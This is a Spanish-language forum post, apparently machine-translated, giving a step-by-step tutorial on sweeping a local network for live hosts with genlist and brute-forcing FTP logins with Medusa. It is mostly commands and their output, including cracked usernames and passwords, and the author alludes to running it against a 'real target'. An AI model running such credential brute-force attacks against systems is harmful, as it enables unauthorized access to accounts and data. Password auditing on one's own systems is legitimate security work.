Comprobación de la debilidad de las credenciales FTP Ingresar con Medusa

Iniciado por syskc0, Marzo 31, 2011, 01:49:08 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Esta guía le mostrará cómo realizar un ftp simple o cualquier otro servicio que es compatible con Medusa para comprobar la debilidad de los datos de acceso
Voy a estar utilizando genlist para recopilar una lista de los ejércitos en vivo que se están ejecutando en la red y han resultado en un archivo txt que Medusa puede utilizar para realizar un ataque de fuerza bruta sobre todas las huestes vivir

voy a empezar con la ruta para encontrar el rango de la red está utilizando

Código: php

syskc0@bt:~# route -n |grep eth1
192.168.1.0     0.0.0.0         255.255.255.0   U     0      0        0 eth1
0.0.0.0         192.168.1.254   0.0.0.0         UG    0      0        0 eth1
syskc0@bt:~#



En el ejemplo anterior en la red que estoy conectado a está utilizando el rango de ip 192.168.1.0 y la

puerta de enlace predeterminada 192.168.1.254, así que analizará toda la máscara de red para los hosts de vivir con genlist

Código: php

syskc0@bt:~# genlist -s  192.168.1.\* > host_c-intruder3s
syskc0@bt:~# cat host_c-intruder3s
192.168.1.67
192.168.1.68
192.168.1.69
192.168.1.77
192.168.1.78
192.168.1.101
192.168.1.254
syskc0@bt:~#


Ahora he obtenido una lista de anfitriones en vivo puedo ir para usar Medusa

Código: php

medusa -v 6 -H host_c-intruder3s -U username.txt  -P pwords.txt  -M ftp


Medusa Opciones

Código: php

-v nivel de detalle seis
H-Lista de Clientes
-U lista Nombre de usuario
-P lista Contraseña
-M FTP tipo de módulo, TELNET, SSH, HTTP, etc


Nota Para este tutorial sólo voy a utilizar una pequeña de usuario / contraseña Lista Para ahorrar tiempo

Mi salida
Código: php

syskc0@bt:~# medusa -v 6 -H host_c-intruder3s -U username.txt  -P pwords.txt  -M ftp |grep "ACCOUNT FOUND"
NOTICE: [ftp.mod] Socket is no longer valid. Server likely dropped connection. Establishing new session.
NOTICE: [ftp.mod] Socket is no longer valid. Server likely dropped connection. Establishing new session.
NOTICE: [ftp.mod] Socket is no longer valid. Server likely dropped connection. Establishing new session.
ACCOUNT FOUND: [ftp] Host: 192.168.1.67 User: zerocold Password: password123 [SUCCESS]
ACCOUNT FOUND: [ftp] Host: 192.168.1.67 User: offsec Password: password [SUCCESS]
NOTICE: [ftp.mod] Socket is no longer valid. Server likely dropped connection. Establishing new session.
NOTICE: [ftp.mod] Socket is no longer valid. Server likely dropped connection. Establishing new session.
NOTICE: [ftp.mod] Socket is no longer valid. Server likely dropped connection. Establishing new session.
NOTICE: [ftp.mod] Socket is no longer valid. Server likely dropped connection. Establishing new session.
ACCOUNT FOUND: [ftp] Host: 192.168.1.68 User: michael Password:jhonadmin [SUCCESS]
ACCOUNT FOUND: [ftp] Host: 192.168.1.77 User: rafael Password: admin123 [SUCCESS]
syskc0@bt:~#


En el ejemplo anterior he utilizado | grep "cuenta que se encuentra" para cortar la mayor parte de la salida, así que sólo reciben los nombres de usuario y contraseñas, pero si yo fuera a hacer esto en el objetivo real no es mi i red doméstica que se ejecuta de forma normal para puedo ver hasta qué punto el ataque está en marcha
el mundo es una variable facil inicias facil terminas

=_=